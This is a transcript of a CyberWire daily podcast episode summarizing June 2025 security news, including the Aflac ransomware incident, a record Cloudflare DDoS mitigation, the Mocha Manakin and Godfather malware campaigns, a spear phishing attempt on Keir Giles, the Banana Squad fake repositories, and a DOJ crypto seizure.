A blast from the breached past.

An historic data breach that wasn’t. Aflac says it stopped a ransomware attack. Cloudflare thwarts a record breaking DDoS attack. Mocha Manakin combines clever social engineering with custom-built malware. The Godfather Android trojan uses a sophisticated virtualization technique to hijack banking and crypto apps. A British expert on Russian information warfare is targeted in a sophisticated spear phishing campaign. A federal judge dismisses a lawsuit against CrowdStrike filed by airline passengers. Banana Squad disguises malicious code as legitimate open-source software. The U.S. Justice Department wants to seize over $225 million in cryptocurrency linked to romance and investment scams. Ben Yelin explains the recent Oversight Committee request for Microsoft to hand over GitHub logs related to alleged DOGE misconduct. This one weird audio trick leaves AI scam calls speechless. 

Today is Friday June 20th 2025. I’m Dave Bittner. And this is your CyberWire Intel Briefing.

An historic data breach that wasn’t. 

News broke yesterday about a so-called “historic” data breach—except, it’s not a breach at all. What actually happened is that someone exposed a massive database of stolen credentials online. But here’s the catch: these credentials weren’t freshly stolen. They were scraped from older breaches, infostealer malware logs, and credential stuffing attacks. In other words, this is a giant compilation of already-compromised data—some of it years old.

Cybernews, who found the exposed trove, said the format matched what’s commonly used by infostealer malware. That malware quietly grabs passwords stored in browsers and apps, then ships them off to cybercriminals. These “logs” get traded or dumped on sites like Telegram all the time.

So no, the sky isn’t falling—again. But yes, you should still update your security hygiene.

Aflac says it stopped a ransomware attack. 

Aflac says it stopped a ransomware attack launched by a “sophisticated cybercrime group” on June 12, though some data was stolen before the breach was contained. While the ransomware didn’t disrupt operations, the stolen files may include sensitive personal and health data from customers, employees, and agents. Aflac suspects the hackers used social engineering, possibly impersonating IT staff, to access systems, a tactic linked to Scattered Spider, a group recently targeting insurance firms. Google and cybersecurity experts warn this campaign is ongoing and highly coordinated. Aflac has alerted the SEC, set up a helpline, and is offering identity protection. The company emphasized its ability to continue business as usual. This is the second breach Aflac has faced in two years, following a 2023 incident involving 1.3 million customers in Japan.

Cloudflare thwarts a record breaking DDoS attack. 

Cloudflare recently stopped a massive DDoS attack that peaked at 7.3 Tbps, the largest it has ever seen. The attack hit a hosting provider in mid-May and lasted just 45 seconds but still delivered 37.4 terabytes of traffic. It targeted nearly 22,000 destination ports per second on a single IP. Over 99% of the traffic was from UDP floods, with smaller amounts from other attack types. The assault came from 122,000 IPs spread across 161 countries, highlighting growing threats to core internet infrastructure.

Mocha Manakin combines clever social engineering with custom-built malware. 

A new cyber threat called Mocha Manakin has emerged, combining clever social engineering with custom-built malware. Discovered by Red Canary back in January, it tricks users with fake instructions, like CAPTCHA tests, that get them to copy and run harmful PowerShell commands. These commands download and launch a backdoor named NodeInitRAT, hidden in a zip file with a legitimate node.exe. Once running, NodeInitRAT can collect data, execute commands, and potentially install ransomware. While no ransomware has yet been linked directly, Red Canary sees a strong possibility, citing links to Interlock ransomware. Mocha Manakin hides its traffic using Cloudflare tunnels, making it harder to detect. Red Canary urges organizations to train users, monitor systems, and block suspicious network activity to guard against this evolving and deceptive threat.

The Godfather Android trojan uses a sophisticated virtualization technique to hijack banking and crypto apps. 

A new version of the Godfather Android trojan is using a sophisticated virtualization technique to hijack banking and crypto apps, according to Zimperium. Based on the Anubis trojan, Godfather now sets up a sandbox on infected devices to run real copies of target apps, making it harder to detect. When users open their apps, they’re redirected to virtualized versions controlled by the malware, which captures everything in real time. Godfather uses open-source tools like Xposed and Virtualapp to pull this off, allowing attackers full visibility and control over user interactions. It also alters APK and Android Manifest files to evade detection and uses Android’s accessibility services to trick users into granting permissions. Currently, it’s been used against Turkish banks.

A British expert on Russian information warfare is targeted in a sophisticated spear phishing campaign. 

Keir Giles, a British expert on Russian information warfare, was recently targeted in a sophisticated spear phishing campaign using advanced social engineering. The attacker posed as a U.S. State Department official named “Claudie S. Weber” and invited Giles to a fake consultation. The ploy was convincing, complete with official-sounding emails and cc’d State Department addresses that didn’t actually exist. Backed by a PDF that mimicked government documentation, the attacker asked Giles to generate an app-specific password (ASP) to access a secure platform. In reality, this would have granted them persistent access to his Gmail. Google and Citizen Lab investigated the attack and linked it with “low confidence” to Russian state-sponsored actor APT29. Though Giles didn’t use the targeted email account, he believes attackers may still manipulate stolen data as part of a broader disinformation effort. Researchers say the campaign was unusually patient and adaptive, likely using a large language model to craft replies.

A federal judge dismisses a lawsuit against CrowdStrike filed by airline passengers. 

A federal judge has dismissed a lawsuit against CrowdStrike filed by airline passengers over its 2024 software update that disrupted airline operations. The judge ruled that the claims were preempted by the Airline Deregulation Act (ADA), even though CrowdStrike isn’t an airline. The court found that the disruptions, affecting ticketing, boarding, and scheduling, were directly tied to airline services, which the ADA protects from inconsistent state laws. Plaintiffs accused CrowdStrike of negligence, claiming it failed to test or warn about the update, which crashed critical systems and stranded travelers. While the plaintiffs argued that CrowdStrike shouldn’t benefit from ADA preemption as a third-party vendor, the court disagreed, emphasizing the company’s central role in airline operations. Even claims of stress and physical injury were dismissed as the court maintained the harm stemmed from service disruptions, not direct personal harm. The decision sets a precedent protecting vendors closely tied to airline operations from certain lawsuits.

Banana Squad disguises malicious code as legitimate open-source software. 

Researchers at ReversingLabs have uncovered a new cyber threat led by Banana Squad, a group known for disguising malicious code as legitimate open-source software. The group created over 60 fake repositories on GitHub, posing as Python hacking tools but secretly containing malware designed to steal sensitive data from Windows systems, targeting apps, browsers, and even cryptocurrency wallets. One tactic involves hiding harmful code in long, invisible lines pushed off-screen, making it hard for developers to detect. Banana Squad previously released hundreds of malicious packages, downloaded nearly 75,000 times before removal. Despite a 70% drop in malware across open-source platforms in 2024, threats are evolving. Attackers now use stealthier, more sophisticated methods. Reports also show rising risks from secret leaks and vulnerable code in popular OSS packages.

The U.S. Justice Department wants to seize over $225 million in cryptocurrency linked to romance and investment scams. 

The U.S. Justice Department is seeking to seize over $225 million in cryptocurrency linked to romance and investment scams run from Vietnam and the Philippines. The funds, traced via blockchain analysis by the FBI and Secret Service, were laundered through hundreds of wallets and thousands of transactions. Over 430 victims across multiple U.S. states were defrauded, often through fake social media connections offering crypto investments. Victims sent millions, only to be locked out of their accounts after being asked for fake “fees” to withdraw funds. The scheme, linked to Vietnamese nationals operating in Philippine “scam compounds,” used fake documents and centralized IP addresses. Exchange OKX and blockchain firm Tether helped track the activity. This marks the largest crypto seizure in U.S. Secret Service history and highlights growing law enforcement capabilities in recovering stolen digital assets amid a broader surge in global crypto scams, which cost victims $5.8 billion last year.

Next up, my Caveat co host, Ben Yelin, joins me to talk about the recent Oversight Committee request for Microsoft to hand over GitHub logs related to alleged misconduct by Elon Musk’s "Department of Government Efficiency". We’ll be right back.

Welcome back. You can find a link to the article Ben discussed in our show notes. 

This one weird audio trick leaves AI scam calls speechless. 

In a world where AI-powered scammers can sweet-talk their way into your bank account, researchers from Israel and India have decided it’s time to fight fire with… weird noises. Their new tool, ASRJam, is a crafty defense against “vishing” scams, those charming robot calls pretending to be helpful strangers with urgent investment opportunities.

ASRJam uses EchoGuard, a sound-bending algorithm that warps your voice just enough to confuse AI speech recognition, while still letting humans understand you. It’s like mumbling in just the right frequency to fluster a robot but not your grandma.

This defense works in real time, invisibly, and unlike previous efforts, it’s subtle—not the audio equivalent of nails on a chalkboard. Against most AI models (including OpenAI’s Whisper), it’s highly effective at scrambling scammer bots mid-chat. The researchers call it “pleasantly disruptive.” Let’s hope scam artists hate it as much as we love the idea of giving them a taste of their own digital medicine.

And that’s the CyberWire.

For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.

 

And that’s the CyberWire.

We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com

We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.

N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com.

We'd love to hear from you. We're conducting our annual audience survey to learn more about our listeners. We're collecting your insights until August 31, 2025. There's a link in the show notes.

 

N2K’s senior producer is Alice Carruth. Our CyberWire producer is Liz Stokes. We’re mixed by Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.